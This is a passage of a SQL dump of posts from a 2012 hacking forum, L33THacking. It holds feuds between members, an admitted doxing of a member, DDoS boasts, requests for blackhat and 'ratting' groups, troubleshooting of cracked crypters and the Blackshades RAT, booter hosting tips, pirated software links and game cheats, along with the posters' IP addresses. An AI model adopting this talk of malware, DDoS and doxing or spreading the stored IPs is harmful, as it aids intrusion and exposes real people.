jok3r', '1349719746', '[quote=\'iTzIpod\' pid=\'3922\' dateline=\'1349703309\']\r\nJust because I said the forum was dead in the VIP Section doesn\'t mean I was behind this. I just said lets try to make it active again because the VIP Section was inactive.\r\n[/quote]\r\n\r\nLet me go home and take screenshotd of you asking about using a traffic bot in LH. We went offline and got banned because of the traffic bot and DDoS attack.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4fcb21aba184f0895d8b01bac794779f', '0', '0'); INSERT INTO mybb_posts VALUES('3938', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '203', 'NeonLights', '1349723153', 'whats his forums il take it down with my 3500 zombies :DD', '67.68.75.160', '1128549280', '1', '0', '0', '0', '1', '00ccf1f51c82030a89005fe21c8b0aa7', '0', '0'); INSERT INTO mybb_posts VALUES('3939', '763', '3921', '58', 'RE: [Announcement]Group Changes', '0', '62', 'R?????zo?', '1349724280', '[quote=\'iTzIpod\' pid=\'3921\' dateline=\'1349703216\']\r\nThanks for the notice. Good luck with Unique someone..\r\n[/quote]\r\n\r\nI will take the leader over Unique group, if iTzIpod ever come back I will give it back, for now I will focus in keeping Unique alive.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '3f09bc64a1bea0e55098c4672e42fc4a', '0', '0'); INSERT INTO mybb_posts VALUES('3940', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '203', 'NeonLights', '1349725370', '[b]Name of group: Ratters[/b]\r\n[b]Group Description: A group for people who love blackhat and love ratting :D[/b]\r\n[b]Group Userbar: [img]http://imageshack.us/a/img802/7561/ratters.gif[/img]I DID NOT MAKE THIS USERBAR NOR TAKE ANY CREDITS FOR MAKING IT[/b]\r\n[b]Forum Name: Ratters[/b]\r\n[b]Forum Icon(34x34):i dont really have one :([/b] \r\n[b]Why LH should make this group official: Because its a nice fun group that many hackers on this forum will love :) and its unique :D and led by a sexy guy called neon :D lol[/b]', '67.68.75.160', '1128549280', '1', '0', '0', '0', '1', 'c9442b71849db3e9c33b2bf8c0d23c8a', '0', '0'); INSERT INTO mybb_posts VALUES('3941', '763', '3939', '58', 'RE: [Announcement]Group Changes', '0', '1', 't3h jok3r', '1349726745', '[quote=\'R?????zo?\' pid=\'3939\' dateline=\'1349724280\']\r\n[quote=\'iTzIpod\' pid=\'3921\' dateline=\'1349703216\']\r\nThanks for the notice. Good luck with Unique someone..\r\n[/quote]\r\n\r\nI will take the leader over Unique group, if iTzIpod ever come back I will give it back, for now I will focus in keeping Unique alive.\r\n[/quote]\r\n\r\nThanks for accepting the opportunity to become the leader of the Unique group.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2b366e08c50f0ea04d023a8c3d59636d', '0', '0'); INSERT INTO mybb_posts VALUES('3942', '763', '3891', '58', 'RE: [Announcement]Group Changes', '0', '214', 'Rave™', '1349727192', 'I would like to take ownership of Unique. I am very HQ and active. I will continue to be so.', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', 'bfac1cf8e3a0ed592a1159113ea95898', '0', '0'); INSERT INTO mybb_posts VALUES('3943', '763', '3942', '58', 'RE: [Announcement]Group Changes', '0', '1', 't3h jok3r', '1349727382', '[quote=\'Rave™\' pid=\'3942\' dateline=\'1349727192\']\r\nI would like to take ownership of Unique. I am very HQ and active. I will continue to be so.\r\n[/quote]\r\n\r\nSorry but I offered Reloadzor first and he accepted the offer.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '768cd691cc0865e8d8ca50e5fdf12217', '0', '0'); INSERT INTO mybb_posts VALUES('3944', '769', '0', '23', 'Math Tools for all Subjects Cracked by Rave', '0', '214', 'Rave™', '1349727396', 'http://www.bagatrix.com/\r\n\r\nI used these tools to pass multiple math classes. They really help with solving problems and even teaching you how to do each step.\r\n\r\nI\'m sure most of you will enjoy these programs!\r\n\r\nTotal Applications: 16\r\n\r\nhttp://www.mediafire.com/?b9ddmpzb3qp14c5\r\n\r\nEnjoy!!!!', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '01f3b159cab196a8bccee091746e5dcd', '0', '0'); INSERT INTO mybb_posts VALUES('3945', '770', '0', '19', '[Junk]Gyzano JDB', '0', '214', 'Rave™', '1349727499', '[lock]http://www.gamefront.com/files/22412495/...solate.rar[/lock]\n\nLeaked from HF ub3r section.', '71.67.179.16', '1195619088', '1', '0', '1', '1352011247', '1', 'bc105390895c8ae8987bbc0011c43154', '0', '1352011247'); INSERT INTO mybb_posts VALUES('3946', '771', '0', '15', 'Skype Resolver Source', '0', '214', 'Rave™', '1349727619', 'Live demo: http://creweu.com/skype/\nDownload: -\n[lock]http://creweu.com/skype/index.zip[/lock]', '71.67.179.16', '1195619088', '1', '0', '1', '1352011274', '1', 'cb120b48bc1de56b048cba1f18c443f3', '0', '1352011274'); INSERT INTO mybb_posts VALUES('3947', '772', '0', '58', 'Group Request', '0', '214', 'Rave™', '1349727750', '[b] Hello Joker,\r\nI have a request that I am hoping we can discuss on skype\r\n\r\nI want to start the group with the name something like\r\n\"Hackers\"\r\nor\r\nsomething related to hackers.\r\nThis group will be a very HQ group of the most HQ hackers on l33thacking. I hope you accept. If you do, I have a man to do the GFX.[/b]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '7ea71380a2039aba0ab96723d461ec8b', '0', '0'); INSERT INTO mybb_posts VALUES('3954', '443', '2055', '42', 'RE: Apple Announces the iPhone 5', '0', '240', 'Hardz', '1349729823', 'I queued up at my local Apple Store in London to buy the new iPhone - I managed to get one and I must say so far I\'m quite pleased with it. I got it in black as not all applications are optimized for the iPhone 5 and have black bars around them which go fairy un-noticeable on the black iPhone but on the white iPhone you can see them quite easily.', '86.135.61.58', '1451703610', '0', '0', '240', '1349729833', '1', '203fb189f6bf20b65f9f2f6af663d2f9', '0', '1349729833'); INSERT INTO mybb_posts VALUES('3949', '772', '3947', '58', 'RE: Group Request', '0', '1', 't3h jok3r', '1349728081', 'Firstly, I have moved the thread to the right section.\r\n\r\nSecondly, when it comes to blackhat groups I can\'t really approve them. I can approve any group except complete blackhat groups. If you want the \"Hackers\" group to be approved then you would have to wait for NXK and Apathy to post their opinion. You are free to PM them this thread so they can check this thread out.\r\n\r\nI don\'t mind having such a group but could you elaborate what exactly this group would be about and how would it benefit L33Thacking? \r\n\r\nLast but never the least (Did I say that right?), I advise people to please request their new groups [url=http://l33thacking.net/thread-212.html]here[/url]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '77d54f52aec1bf2367147ce70900cd35', '0', '0'); INSERT INTO mybb_posts VALUES('3950', '772', '3947', '58', 'RE: Group Request', '0', '214', 'Rave™', '1349728341', 'This group will benefit LH because it will attract many many leechers and hackers such like me, to leak, leech from other forums, and post hack tools and will help in the growth of this forum', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '7e68ec606fc85401ef4f4ff89e562a51', '0', '0'); INSERT INTO mybb_posts VALUES('3952', '772', '3950', '58', 'RE: Group Request', '0', '1', 't3h jok3r', '1349729048', '[quote=\'Rave™\' pid=\'3950\' dateline=\'1349728341\']\r\nThis group will benefit LH because it will attract many many leechers and hackers such like me, to leak, leech from other forums, and post hack tools and will help in the growth of this forum\r\n[/quote]\r\n\r\nWe don\'t want leechers etc because then our private methods etc would get saturated.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '652c20261b36e3f35ac8e1ba9847b88c', '0', '0'); INSERT INTO mybb_posts VALUES('3953', '494', '2406', '42', 'RE: Chinese Man Has Lived on Water Alone for the Last 12 Years', '0', '240', 'Hardz', '1349729622', 'Well that\'s pretty strange. He must be really skinny - although I suppose the majority of Chinese people are very tall, skinny, and good at participating in Olympic events.', '86.135.61.58', '1451703610', '0', '0', '0', '0', '1', '83bb669b22c2a38ca568ecd5459275f3', '0', '0'); INSERT INTO mybb_posts VALUES('3955', '749', '3822', '4', 'RE: It\'s BreShiE!', '0', '232', 'BreShiE', '1349730242', 'Yeah, it is sirchamp. That\'s why I have it in my signature. :)', '78.149.61.34', '1318403362', '1', '0', '0', '0', '1', '8d43727d6256df071a02892cad263f59', '0', '0'); INSERT INTO mybb_posts VALUES('3956', '214', '3750', '52', 'RE: [tut] Creating a IPod PID Generator', '0', '232', 'BreShiE', '1349730293', '[quote=\'Rave™\' pid=\'3750\' dateline=\'1349613260\']\r\nCan someone help me with this?\r\n[/quote]\r\n\r\nWhat problems are you having?', '78.149.61.34', '1318403362', '1', '0', '0', '0', '1', '11f75343a8cd38c341934496be51d7c4', '0', '0'); INSERT INTO mybb_posts VALUES('3957', '772', '3947', '58', 'RE: Group Request', '0', '214', 'Rave™', '1349730555', 'That is why we have the private method in the Hackers Method.', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '80e071d8b92057b0914c5361bac24718', '0', '0'); INSERT INTO mybb_posts VALUES('3958', '98', '233', '20', 'RE: FREE UD RazorCrypter (Cracked)', '0', '203', 'NeonLights', '1349731250', 'this doesnt work for me when i crypt my server i run it then the server doesnt open nothing happens\n[hr]\nand now its giving me this error:\nsorry hwid dosnt match WTF', '67.68.75.160', '1128549280', '1', '0', '203', '1349731411', '1', 'cc6b7eeaac4a309040d507dee432a187', '0', '0'); INSERT INTO mybb_posts VALUES('3959', '713', '3640', '12', 'RE: How To Make A FUD Java Drive-By', '0', '203', 'NeonLights', '1349731676', 'rave do u rat ?\nif so could u send me ur skype in pm i would love to talk with u for a lil :D', '67.68.75.160', '1128549280', '1', '0', '0', '0', '1', '3c0a8fbdb5d50190010f7294433b2aa8', '0', '0'); INSERT INTO mybb_posts VALUES('3960', '773', '0', '9', 'Easy Money, Little Effort', '0', '241', 'Constrain', '1349731685', '[align=center]Hey guys, first post here. I am bringing you a guide on how to easily make a few extra bucks in about 30 minutes.\r\n\r\nThe site is called naturebucks. Now many have heard of this but I will be teaching you guys some methods on how to earn even more money.\r\n\r\nRegister here: [url=http://naturebucks.com/members/register.php?ref=Constrain]Link[/url]\r\n\r\nNow here are some tips:\r\n\r\n- Survey companys like a family man who makes money\r\n- Do the daily offers, they are easy\r\n- Make a fake email, you will get spammed on it, so use it for the surveys\r\n\r\nEnjoy guys! \r\n\r\nProof of earnings:\r\n[img]http://i.imgur.com/hxuW9.png[/img]\r\n\r\n[/align]', '108.18.121.45', '1813149997', '0', '0', '0', '0', '1', '8ca346d961338a40eda871a8f8dd6d25', '0', '0'); INSERT INTO mybb_posts VALUES('3961', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '3', '??????????¢™', '1349734471', 'Anarchy sucks is a fucking skid. Trying to steal members from the best forum so that your shitty forum could become hq and active like LH. GTFO Skid.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '57df0945345bd70dc4acd9f8c6975a1b', '0', '0'); INSERT INTO mybb_posts VALUES('3962', '392', '1816', '9', 'RE: PPD Niches', '0', '82', 'iTzIpod', '1349734697', 'Go on Leakforums and go on Skill\'s PPD thread.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3855d9998c5d8278c6fd3dd0da122f9f', '0', '0'); INSERT INTO mybb_posts VALUES('3963', '734', '3733', '3', 'RE: Downtime, PMs and Members', '0', '82', 'iTzIpod', '1349734751', 'Thought we already knew that... -.-\n\n^\n\nAnd also, I do want to leave. I\'m just checking on what\'s happening.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9858e1e0bbf2b14b5efe54eb05bba529', '0', '0'); INSERT INTO mybb_posts VALUES('3964', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1349734793', 'Good luck with that.. ^ \n\nShouldn\'t infect LH members though.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2b9e77369c9daa743e62073d8a4db046', '0', '0'); INSERT INTO mybb_posts VALUES('3965', '763', '3891', '58', 'RE: [Announcement]Group Changes', '0', '82', 'iTzIpod', '1349734833', 'Good luck Reloadzor with Unique in your hands.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a67d5cdd2fcd7388d38a363fba8819d1', '0', '0'); INSERT INTO mybb_posts VALUES('3966', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '203', 'NeonLights', '1349734847', 'wtf are u talking about its a fucking group...\nand if i had the intention to come here to infect ppl dont u think id be butt fucked by now?\n[hr]\nand apparently anarchy says ur his friend?\nif so why are u still here', '67.68.75.160', '1128549280', '1', '0', '203', '1349734881', '1', 'f8a610a36c78ee446aa64a87269b646e', '0', '0'); INSERT INTO mybb_posts VALUES('3967', '759', '3871', '7', 'RE: Join the LH Skype Group!', '0', '3', '??????????¢™', '1349735043', 'I have sent a request to flamingworm, when he accepts it hopefully he adds me to the group chat.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'ae409976a00a02c744d780fdde4a925c', '0', '0'); INSERT INTO mybb_posts VALUES('3968', '734', '3963', '3', 'RE: Downtime, PMs and Members', '0', '1', 't3h jok3r', '1349735133', '[quote=\'iTzIpod\' pid=\'3963\' dateline=\'1349734751\']\nThought we already knew that... -.-\n\n^\n\nAnd also, I do want to leave. I\'m just checking on what\'s happening.\n[/quote]\n\nYou won\'t stay on L33THacking. To be honest, Anarchy forum is going to fuck you up after you using you and I have stopped caring about you. Anarchist is keep on annoying me by creating fake accounts, I will continue to fuck around with him and his site.', '173.245.64.228', '-1376435996', '1', '0', '1', '1349735342', '1', '01a6dc28a42742e904933c4ca33afe05', '0', '1349735342'); INSERT INTO mybb_posts VALUES('3969', '734', '3963', '3', 'RE: Downtime, PMs and Members', '0', '3', '??????????¢™', '1349735140', '[quote=\'iTzIpod\' pid=\'3963\' dateline=\'1349734751\']\r\nThought we already knew that... -.-\r\n\r\n^\r\n\r\nAnd also, I do want to leave. I\'m just checking on what\'s happening.\r\n[/quote]\r\n\r\nAre you leaving due to issues in your life or are you taking a break?', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'c4fd64277a4d576c709dea33145012cb', '0', '0'); INSERT INTO mybb_posts VALUES('3970', '763', '3891', '58', 'RE: [Announcement]Group Changes', '0', '62', 'R?????zo?', '1349735180', 'thanks, you are welcome anytime to take your previous spot <3', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '3491388ee0311cad31d850a98a29a0c5', '0', '0'); INSERT INTO mybb_posts VALUES('3971', '734', '3969', '3', 'RE: Downtime, PMs and Members', '0', '1', 't3h jok3r', '1349735405', '[quote=\'??????????¢™\' pid=\'3969\' dateline=\'1349735140\']\r\n[quote=\'iTzIpod\' pid=\'3963\' dateline=\'1349734751\']\r\nThought we already knew that... -.-\r\n\r\n^\r\n\r\nAnd also, I do want to leave. I\'m just checking on what\'s happening.\r\n[/quote]\r\n\r\nAre you leaving due to issues in your life or are you taking a break?\r\n[/quote]\r\n\r\nHe is leaving because he is scared that Anarchist would release his DOX. I already [b]did[/b] it because either way his info. was going online. Anarchist is next.', '173.245.64.228', '-1376435996', '1', '0', '0', '0', '1', 'a3c429de69a39965f2d0ed270bc945f2', '0', '0'); INSERT INTO mybb_posts VALUES('3972', '734', '3971', '3', 'RE: Downtime, PMs and Members', '0', '3', '??????????¢™', '1349736114', '[quote=\'t3h jok3r\' pid=\'3971\' dateline=\'1349735405\']\r\n[quote=\'??????????¢™\' pid=\'3969\' dateline=\'1349735140\']\r\n[quote=\'iTzIpod\' pid=\'3963\' dateline=\'1349734751\']\r\nThought we already knew that... -.-\r\n\r\n^\r\n\r\nAnd also, I do want to leave. I\'m just checking on what\'s happening.\r\n[/quote]\r\n\r\nAre you leaving due to issues in your life or are you taking a break?\r\n[/quote]\r\n\r\nHe is leaving because he is scared that Anarchist would release his DOX. I already [b]did[/b] it because either way his info. was going online. Anarchist is next.\r\n[/quote]\r\n\r\nSo you do not care for him anymore?', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '56834f7041805f4ae8a5c71aa5ea5c6a', '0', '0'); INSERT INTO mybb_posts VALUES('3973', '759', '3871', '7', 'RE: Join the LH Skype Group!', '0', '203', 'NeonLights', '1349736280', 'no porn unless warned? LOL\nok adding u guys right now :O', '67.68.75.160', '1128549280', '1', '0', '0', '0', '1', 'bd1947baedb683353bc98839666d8115', '0', '0'); INSERT INTO mybb_posts VALUES('3974', '759', '3871', '7', 'RE: Join the LH Skype Group!', '0', '82', 'iTzIpod', '1349736366', 'Why\'d I get kicked? :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ae17a1d8ef0126ecc788d2fcfe5836f5', '0', '0'); INSERT INTO mybb_posts VALUES('3975', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '82', 'iTzIpod', '1349736483', 'Just because I suggested it, doesn\'t mean I used it. \n\n+ Why the fuck would you post that dox of me online?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a883466e75f7f0f7a964b54afd1cd639', '0', '0'); INSERT INTO mybb_posts VALUES('3976', '759', '3974', '7', 'RE: Join the LH Skype Group!', '0', '3', '??????????¢™', '1349736501', '[quote=\'iTzIpod\' pid=\'3974\' dateline=\'1349736366\']\nWhy\'d I get kicked? :/\n[/quote]\n\nI am guessing because you are no longer apart of LH and because you are on Anarchist side MAYBE.', '75.38.19.52', '1260786484', '1', '0', '3', '1349736510', '1', 'bb78e8488a76c940f82404f8239accb6', '0', '1349736510'); INSERT INTO mybb_posts VALUES('3977', '672', '3409', '30', 'RE: Blackshades NET [Setup + download]', '0', '203', 'NeonLights', '1349736520', 'doesnt work -.-\nwhenever i enter my ports and click activate i dont receiver any victims...\nthe ports dont work but there forwarded', '67.68.75.160', '1128549280', '1', '0', '0', '0', '1', 'ab804bc41af1bf6522ac868c035f268d', '0', '0'); INSERT INTO mybb_posts VALUES('3978', '747', '3975', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '3', '??????????¢™', '1349736548', '[quote=\'iTzIpod\' pid=\'3975\' dateline=\'1349736483\']\r\nJust because I suggested it, doesn\'t mean I used it. \r\n\r\n+ Why the fuck would you post that dox of me online?\r\n[/quote]\r\n\r\nDont get mad now little one.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'e3f09dfef8d170b21ea8e6585f04fcf8', '0', '0'); INSERT INTO mybb_posts VALUES('3979', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1349736625', 'I didn\'t say it was a group. Or I didn\'t say it was not a group.\nI just said Good luck with that.\nI didn\'t mean to say\nOh you shouldn\'t infect members on LH with your RATs.\nI just meant. Just be sure not to infect members with your RAT on LH.\nJust because I\'m AF\'s friend, doesn\'t mean I can\'t go on L33tHacking does it?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5215fb15a9baa4632ca12c187ab1e3d4', '0', '0'); INSERT INTO mybb_posts VALUES('3980', '763', '3891', '58', 'RE: [Announcement]Group Changes', '0', '82', 'iTzIpod', '1349736656', 'It\'s alright. You deserve it .', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '85e7b119b3adeb66746f431f7044178a', '0', '0'); INSERT INTO mybb_posts VALUES('3981', '734', '3733', '3', 'RE: Downtime, PMs and Members', '0', '82', 'iTzIpod', '1349736719', 'So you admit you released my dox... -.-\n\nAlright. I see how it is. I guess we\'re no longer friends.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '294e70ab1b20c54c5b15a4c363f7ed7d', '0', '0'); INSERT INTO mybb_posts VALUES('3982', '734', '3733', '3', 'RE: Downtime, PMs and Members', '0', '3', '??????????¢™', '1349736997', 'lol jok3r send me his dox if you dont mind. Time to get revenge for treating me bad.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '70e42d012ae24089a27ecc0d75e700ad', '0', '0'); INSERT INTO mybb_posts VALUES('3983', '763', '3891', '58', 'RE: [Announcement]Group Changes', '0', '3', '??????????¢™', '1349737717', 'Hopefully the new owner could keep the group active and HQ.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '810699c10e20b0e55e4f4a250e5e4b20', '0', '0'); INSERT INTO mybb_posts VALUES('3984', '759', '3871', '7', 'RE: Join the LH Skype Group!', '0', '203', 'NeonLights', '1349742192', 'why no one adding me -.-\ni sent request to both of u D:', '67.68.75.160', '1128549280', '1', '0', '0', '0', '1', 'e9ac1a0db0e1b9afe92894ad3c9509a8', '0', '0'); INSERT INTO mybb_posts VALUES('3985', '759', '3871', '7', 'RE: Join the LH Skype Group!', '0', '82', 'iTzIpod', '1349743670', 'NeonLights why did you delete me :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '91fb8e758b5ef0cbcf916b03a2176965', '0', '0'); INSERT INTO mybb_posts VALUES('3986', '734', '3733', '3', 'RE: Downtime, PMs and Members', '0', '82', 'iTzIpod', '1349743759', '??????????¢™\n\nIf you dare do anything, I\'ll get MY Revenge back on you. + Release A lot/All of my anger on you. \n\nI\'ll know if it was you or not.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e64863a85f35fc097da318410f2a9881', '0', '0'); INSERT INTO mybb_posts VALUES('3987', '763', '3891', '58', 'RE: [Announcement]Group Changes', '0', '82', 'iTzIpod', '1349743799', 'He can. I know Reloadzor can. It\'s in his blood.\nOr, iTzGRONGamer61 can do it too.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '32291d2bec3778bf87c7b3a1f1e70092', '0', '0'); INSERT INTO mybb_posts VALUES('3988', '734', '3982', '3', 'RE: Downtime, PMs and Members', '0', '1', 't3h jok3r', '1349745388', '[quote=\'??????????¢™\' pid=\'3982\' dateline=\'1349736997\']\r\nlol jok3r send me his dox if you dont mind. Time to get revenge for treating me bad.\r\n[/quote]\r\n\r\nDude there\'s no need for anyone to have his DOX anymore because he doesn\'t not know what he\'s doing. \r\n\r\n@Ipod don\'t talk when you don\'t know what\'s going on. I\'m not threathening or saying that I will do anything what I\'m saying is you don\'t think before you do and people are starting to take advantage of you.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '58f52d91a1a78d6dceeb5b84f8410c6f', '0', '0'); INSERT INTO mybb_posts VALUES('3989', '212', '3979', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '1', 't3h jok3r', '1349745689', '[quote=\'iTzIpod\' pid=\'3979\' dateline=\'1349736625\']\r\nI didn\'t say it was a group. Or I didn\'t say it was not a group.\r\nI just said Good luck with that.\r\nI didn\'t mean to say\r\nOh you shouldn\'t infect members on LH with your RATs.\r\nI just meant. Just be sure not to infect members with your RAT on LH.\r\nJust because I\'m AF\'s friend, doesn\'t mean I can\'t go on L33tHacking does it?\r\n[/quote]\r\n\r\nWell you do have a point, you are welcome to L33THacking but like everyone if someone violates LH rules then they either get a warning or get banned.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5e5ed85e6f69f5c92e97c33917b7f384', '0', '0'); INSERT INTO mybb_posts VALUES('3990', '747', '3975', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349745877', '[quote=\'iTzIpod\' pid=\'3975\' dateline=\'1349736483\']\r\nJust because I suggested it, doesn\'t mean I used it. \r\n\r\n+ Why the fuck would you post that dox of me online?\r\n[/quote]\r\n\r\nI created 50% of it, the other 50% was created by someone else and posted by a third party which had the full DOX. So I did not post the DOX believe it or not, it\'s your mind so you decide who to trust OR you can ask Pastebin if you can get the paste posters IP. \r\n\r\nI have Anarchists\' original and VPN IP so you can check it out.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5bf923d4f684ceb4e28bd0d96596e7a1', '0', '0'); INSERT INTO mybb_posts VALUES('3991', '759', '3871', '7', 'RE: Join the LH Skype Group!', '0', '222', 'Exposé', '1349750375', 'Itzipod nothing against you but you went against LH and sided with AnarchyForums. We want 100% dedicated members on LH', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '204865d2e401cfeee6bcc724616b523a', '0', '0'); INSERT INTO mybb_posts VALUES('3992', '774', '0', '19', '[Junk]What is expected of you!', '0', '222', 'Exposé', '1349750481', 'Here in the fearless group it is expected that you release as much social engineering content as you can here and on the forum. I expect you to be active on the forum and not do anything stupid. I will be posting some cool tuts for you guys and hopefully we can get some good shit here :D', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '04ae3dee3119cfcfdc90bb097cef6b84', '0', '0'); INSERT INTO mybb_posts VALUES('3993', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '4', 'Triple H', '1349751455', 'I just checked out Anarchy, I thought that Anarchy was a cool forum because I thought LH won\'t create low class rivals but I was wrong. Jok3r why did you create a rivalry with a site that is on even on the page on your own? The owner is a pussy and can\'t keep content that we have.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0d039ef6fe19754b1397de3433ee5587', '0', '0'); INSERT INTO mybb_posts VALUES('3994', '198', '1426', '21', 'RE: [Tutorial] Setting up your own web Booter[Source Included]', '0', '4', 'Triple H', '1349751523', '[quote=\'Jacob\' pid=\'1426\' dateline=\'1346503750\']\r\nI need a good free host for this. Anybody have one?\r\n[/quote]\r\n\r\nSorry for the late reply. Try xhostfire or xhostding.biz, ixam-hosting doesn\'t allow Booters but give them a try they have good servers.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ec608c22f4c20bab5d0fa761fa4f74f6', '0', '0'); INSERT INTO mybb_posts VALUES('3995', '772', '3947', '58', 'RE: Group Request', '0', '4', 'Triple H', '1349751697', 'I like the idea. +1 for Rave and how about adding these suggestions?\n\n1. Make the group name very common such as unknown hackers, hackers, the blackhats etc because then it will be hard to find the group which will made it hard for the feds to find this group just incase if someone did something.\n2. Maybe make the group invite only so this group only has real hackers and not skids.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9d79ca59bc7e678f50957f831ce8a8d5', '0', '0'); INSERT INTO mybb_posts VALUES('3996', '747', '3990', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '246', 'The Anarchist', '1349751953', '[quote=\'t3h jok3r\' pid=\'3990\' dateline=\'1349745877\']\n[quote=\'iTzIpod\' pid=\'3975\' dateline=\'1349736483\']\nJust because I suggested it, doesn\'t mean I used it. \n\n+ Why the fuck would you post that dox of me online?\n[/quote]\n\nI created 50% of it, the other 50% was created by someone else and posted by a third party which had the full DOX. So I did not post the DOX believe it or not, it\'s your mind so you decide who to trust OR you can ask Pastebin if you can get the paste posters IP. \n\nI have Anarchists\' original and VPN IP so you can check it out.\n[/quote]\n\nMy IP means nothing and neither would a DOX on me. I am 90% sure my ISP would tell you to fuck off, if you even managed to speak their language.\nThe fact you\'ve gone as low as DOXing your own members is pathetic. I spoke to Ipod in a very reasonable fashion and he claims that you DOXed him. I don\'t engage in such petty sport.\n\nHowever, you\'ve sca-mmed people, DOXed your own users, and you filter messages with strong criticism. You\'re a terrible leader.\n\n[quote=\'??????????¢™\' pid=\'3961\' dateline=\'1349734471\']\n[Anarchys] is a fucking skid. Trying to steal members from the best forum so that your shitty forum could become hq and active like LH. GTFO Skid.\n[/quote]\n\nActually, I had nothing to do with the private messages sent out. Someone else had sent those.\nIronically, your site\'s members were the first to spam, as several of our users claimed to have received spam messages from your site.', '108.171.103.234', '1823172586', '0', '0', '246', '1349752374', '1', 'ae7a24b80e68c54a92496edc5ea54e2f', '0', '1349752374'); INSERT INTO mybb_posts VALUES('3997', '775', '0', '75', 'GTA San Andreas Cheats', '0', '4', 'Triple H', '1349752103', '[color=#1E90FF][font=Tahoma][size=large][align=center][b]Grand Theft Auto: San Andres Cheats[/b][/align][/size][/font][/color]\r\n\r\n[b]Infinite health[/b]\r\nWhile playing the game, press Down, X, Right, Left, Right, R1, Right, Down, Up, Triangle. If you entered the code correctly, a message will appear. Note: Falls, explosions, drowning, and vehicle rundowns are still harmful.\r\n\r\n[b]Infinite ammunition[/b]\r\nWhile playing the game, press L1, R1, Square, R1, Left, R2, R1, Left, Square, Down, L1(2). If you entered the code correctly, a message will appear. You no longer need to reload, and will have unlimited ammunition for each new weapon that is picked up. Repeat this code to disable its effect.\r\n\r\n[b]Weapons (tier 1)[/b]\r\nWhile playing the game, press R1, R2, L1, R2, Left, Down, Right, Up, Left, Down, Right, Up. If you entered the code correctly, a message will appear. The least powerful weapons in each category and rocket launcher will be unlocked. To get infinite ammunition for this or the other weapons tiers, repeatedly enable the code until no ammunition number appears beneath the gun pictures. Note: Enabling this code will cause your street creds to drop in points. You can check your creds in the stats menu at the pause screen. If you are in the negative, you are a Playa-Hater.\r\n\r\n[b]Weapons (tier 2)[/b]\r\nWhile playing the game, press R1, R2, L1, R2, Left, Down, Right, Up, Left, Down(2), Left. If you entered the code correctly, a message will appear. The moderate powered weapons in each category will be unlocked, including the flame thrower and sniper rifle. Note: Enabling this code will cause your street creds to drop in points. You can check your creds in the stats menu at the pause screen. If you are in the negative, you are a Playa-Hater.\r\n\r\n[b]Weapons (tier 3)[/b]\r\nWhile playing the game, press R1, R2, L1, R2, Left, Down, Right, Up, Left, Down(3). If you entered the code correctly, a message will appear. The high powered weapons in each category will be unlocked, including the chainsaw and lock-on bazooka. Note: Enabling this code will cause your street creds to drop in points. You can check your creds in the stats menu at the pause screen. If you are in the negative, you are a Playa-Hater.\r\n\r\n[b]Hitman level in all weapons[/b]\r\nWhile playing the game, press Down, Square, X, Left, R1, R2, Left, Down(2), L1(3) to receive dual wield, etc. If you entered the code correctly, a message will appear.\r\n\r\n[b]Health, armor, and money[/b]\r\nWhile playing the game, press R1, R2, L1, X, Left, Down, Right, Up, Left, Down, Right, Up. If you entered the code correctly, a message will appear. Note: You must enter this code multiple times to increase your total money. If this code is enabled when your car is smoking or damaged it will get repaired. During various missions where you are in a car while someone else drives and you shoot (for example, Reuniting The Families), enabling this code will instead blow the car up, failing the mission.\r\n\r\n[b]Pimping mission completed[/b]\r\nWhile playing the game, press Right, L2(2), Down, L2, Up(2), 